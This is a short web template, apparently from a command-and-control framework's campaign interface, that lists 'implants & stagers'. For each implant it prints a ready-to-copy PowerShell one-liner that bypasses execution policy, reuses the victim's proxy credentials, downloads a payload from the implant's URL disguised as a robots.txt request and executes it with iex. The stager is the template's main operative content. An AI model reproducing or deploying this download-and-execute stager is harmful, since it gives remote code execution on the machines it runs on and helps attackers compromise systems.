{% extends "ImplantMain.html" %}
{% block main2 %}
<div class="m-0 p-3">
    <h4>Existing Implants & Stagers</h4>
    {% if implantList %}
        {% for implant in implantList %}
    <p><span class="font-weight-bold">Name:</span> {{ implant[1] }}<br>
        <span class="font-weight-bold">Description:</span> {{ implant[2] }}<br>
        <span class="font-weight-bold">URL:</span> {{implant[3] }}</p>


            <div>
        <code>powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://<b>{{implant[3]}}</b>/robots.txt?user={{ implant[4] }}')|iex"</code>
    </div><hr>
        {% endfor %}
    {% else %}
        <p>There are no implant associated with this campaign yet.</p>
    {% endif %}


</div>
{% endblock %}